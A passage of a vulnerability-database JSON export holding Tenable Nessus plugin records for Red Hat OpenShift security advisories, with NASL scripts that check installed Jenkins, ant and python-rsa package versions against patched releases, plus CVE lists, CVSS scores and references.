'rhocp-4.5-for-rhel-8-x86_64-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-source-rpms'\n ]\n};\n\nvar repo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\nvar pkgs = [\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'exists_check':'atomic-openshift-', 'repo_list':['openshift_4_5_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'exists_check':'atomic-openshift-', 'repo_list':['openshift_4_5_el7']},\n {'reference':'jenkins-2.263.3.1612434332-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'atomic-openshift-', 'repo_list':['openshift_4_5_el7', 'openshift_4_5_el8']},\n {'reference':'openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'atomic-openshift-', 'repo_list':['openshift_4_5_el7', 'openshift_4_5_el8']},\n {'reference':'openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'atomic-openshift-', 'repo_list':['openshift_4_5_el7', 'openshift_4_5_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'atomic-openshift-', 'repo_list':['openshift_4_5_el7', 'openshift_4_5_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'atomic-openshift-', 'repo_list':['openshift_4_5_el7', 'openshift_4_5_el8']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'atomic-openshift-', 'repo_list':['openshift_4_5_el7', 'openshift_4_5_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'atomic-openshift-', 'repo_list':['openshift_4_5_el7', 'openshift_4_5_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'atomic-openshift-', 'repo_list':['openshift_4_5_el7', 'openshift_4_5_el8']}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n var repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference &&\n release &&\n (rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets) || (!exists_check || rpm_exists(release:release, rpm:exists_check))) &&\n rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'conmon / jenkins / openshift-ansible / openshift-ansible-test / etc');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:conmon", "p-cpe:/a:redhat:enterprise_linux:jenkins", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test", "p-cpe:/a:redhat:enterprise_linux:openshift-clients", "p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube"], "solution": "Update the affected packages.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2021-21605", "vpr": {"risk factor": "Medium", "score": "6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-03T00:00:00", "vulnerabilityPublicationDate": "2020-05-14T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "REDHAT-RHSA-2021-0637.NASL", "hash": "42503674b0a6573cf03ed6e9e015115b", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-03-03T00:00:00", "modified": "2021-10-07T00:00:00", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147013", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://cwe.mitre.org/data/definitions/611.html", "https://cwe.mitre.org/data/definitions/862.html", "https://bugzilla.redhat.com/1895946", "https://bugzilla.redhat.com/1925143", "https://bugzilla.redhat.com/1895940", "https://bugzilla.redhat.com/1895947", "https://access.redhat.com/security/cve/CVE-2021-21611", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2308", "https://bugzilla.redhat.com/1925140", "https://access.redhat.com/security/cve/CVE-2020-2307", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2305", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25658", "https://cwe.mitre.org/data/definitions/59.html", "https://cwe.mitre.org/data/definitions/200.html", "https://cwe.mitre.org/data/definitions/863.html", "https://bugzilla.redhat.com/1925145", "https://bugzilla.redhat.com/1925156", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1945", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1895939", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://bugzilla.redhat.com/1925157", "https://bugzilla.redhat.com/1925141", "https://access.redhat.com/security/cve/CVE-2020-2304", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1837444", "https://bugzilla.redhat.com/1925159", "https://bugzilla.redhat.com/1889972", "https://cwe.mitre.org/data/definitions/502.html", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1925160", "https://access.redhat.com/errata/RHSA-2021:0637", "https://bugzilla.redhat.com/1925151", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://access.redhat.com/security/cve/CVE-2020-25658", "https://bugzilla.redhat.com/1895941", "https://access.redhat.com/security/cve/CVE-2020-2306", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11979", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2309", "https://cwe.mitre.org/data/definitions/770.html", "https://bugzilla.redhat.com/1895945", "https://access.redhat.com/security/cve/CVE-2020-2305", "https://access.redhat.com/security/cve/CVE-2021-21607", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2304", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2306", "https://access.redhat.com/security/cve/CVE-2021-21605", "https://access.redhat.com/security/cve/CVE-2020-2308", "https://bugzilla.redhat.com/1925161", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://cwe.mitre.org/data/definitions/79.html", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/security/cve/CVE-2021-21610", "https://cwe.mitre.org/data/definitions/20.html", "https://cwe.mitre.org/data/definitions/385.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2307", "https://access.redhat.com/security/cve/CVE-2020-2309"], "cvelist": ["CVE-2020-1945", "CVE-2020-2304", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2309", "CVE-2020-11979", "CVE-2020-25658"], "immutableFields": [], "lastseen": "2021-10-07T23:48:09", "history": [{"bulletin": {"id": "REDHAT-RHSA-2021-0637.NASL", "hash": "367e680f21052ae045c6fbcdd8075c8646ff0b0f8313f7e451ebd7ed1e2e0163", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-03T00:00:00", "modified": "2021-03-03T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147013", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2020-2307", "https://access.redhat.com/security/cve/CVE-2020-2304", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://access.redhat.com/security/cve/CVE-2020-2305", "https://access.redhat.com/security/cve/CVE-2020-25658", "https://bugzilla.redhat.com/1895947", "https://bugzilla.redhat.com/1889972", "https://access.redhat.com/security/cve/CVE-2020-2308", "https://bugzilla.redhat.com/1895945", "https://bugzilla.redhat.com/1895941", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://cwe.mitre.org/data/definitions/862.html", "https://access.redhat.com/security/cve/CVE-2020-2309", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1895939", "https://bugzilla.redhat.com/1895940", "https://cwe.mitre.org/data/definitions/611.html", "https://bugzilla.redhat.com/1837444", "https://cwe.mitre.org/data/definitions/200.html", "https://access.redhat.com/security/cve/CVE-2020-2306", "https://access.redhat.com/errata/RHSA-2021:0637", "https://bugzilla.redhat.com/1895946", "https://cwe.mitre.org/data/definitions/385.html", "https://bugzilla.redhat.com/1903702"], "cvelist": ["CVE-2020-2308", "CVE-2020-2304", "CVE-2020-2307", "CVE-2020-2306", "CVE-2020-2305", "CVE-2020-25658", "CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2309"], "immutableFields": [], "lastseen": "2021-03-05T06:17:16", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2021-03-05T06:17:16", "references": [{"idList": ["USN-4380-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"], "type": "openvas"}, {"idList": ["ASA-202005-15", "ASA-202012-5"], "type": "archlinux"}, {"idList": ["REDHAT-RHSA-2021-0038.NASL", "GENTOO_GLSA-202011-18.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "EULEROS_SA-2021-1133.NASL", "FEDORA_2020-92B1D001B3.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "REDHAT-RHSA-2021-0034.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "FEDORA_2020-2640AA4E19.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL"], "type": "nessus"}, {"idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"], "type": "github"}, {"idList": ["OPENSUSE-SU-2020:1022-1"], "type": "suse"}, {"idList": ["CVE-2020-2308", "CVE-2020-2304", "CVE-2020-2307", "CVE-2020-2306", "CVE-2020-2305", "CVE-2020-25658", "CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2309"], "type": "cve"}, {"idList": ["FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF"], "type": "fedora"}, {"idList": ["RHSA-2021:0429", "RHSA-2021:0037", "RHSA-2021:0282", "RHSA-2020:5634", "RHSA-2021:0637", "RHSA-2021:0423", "RHSA-2020:2618", "RHSA-2021:0039", "RHSA-2021:0034", "RHSA-2021:0038"], "type": "redhat"}, {"idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"], "type": "freebsd"}, {"idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUOCT2020", "ORACLE:CPUJAN2021"], "type": "oracle"}, {"idList": ["GLSA-202007-34", "GLSA-202011-18"], "type": "gentoo"}], "rev": 2}, "score": {"modified": "2021-03-05T06:17:16", "rev": 2, "value": 6.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147013", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0637. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147013);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/03\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-2304\",\n \"CVE-2020-2305\",\n \"CVE-2020-2306\",\n \"CVE-2020-2307\",\n \"CVE-2020-2308\",\n \"CVE-2020-2309\",\n \"CVE-2020-11979\",\n \"CVE-2020-25658\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0637\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/385.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/611.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/862.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2305\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2307\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2309\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0637\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1889972\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895939\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895940\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895941\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1895947\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11979\");\n script_cwe_id(200, 377, 385, 611, 862);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:3.11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:3.11::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-rsa\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_3_11_el7': [\n 'rhel-7-server-ose-3.11-debug-rpms',\n 'rhel-7-server-ose-3.11-rpms',\n 'rhel-7-server-ose-3.11-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0637');\n}\n\npkgs = [\n {'reference':'jenkins-2-plugins-3.11.1612862361-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'jenkins-2.263.3.1612433584-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']},\n {'reference':'python2-rsa-4.5-3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_3_11_el7']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jenkins / jenkins-2-plugins / python2-rsa');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["cpe:/a:redhat:openshift:3.11", "p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/a:redhat:openshift:3.11::el7", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:python2-rsa", "p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-03-05T06:17:16", "differentElements": ["sourceData"], "edition": 1}, {"bulletin": {"id": "REDHAT-RHSA-2021-0637.NASL", "hash": "e4aad02850f10c3785abd7b825020abfe0681cde622ac8b5fa5e10b001b52ad4", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 : OpenShift Container Platform 3.11.394 bug fix and (RHSA-2021:0637)", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0637 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2304)\n\n - jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks\n (CVE-2020-2305)\n\n - jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information\n disclosure (CVE-2020-2306)\n\n - jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes Plugin\n (CVE-2020-2307)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates\n (CVE-2020-2308)\n\n - jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows enumerating credentials\n IDs (CVE-2020-2309)\n\n - python-rsa: bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", 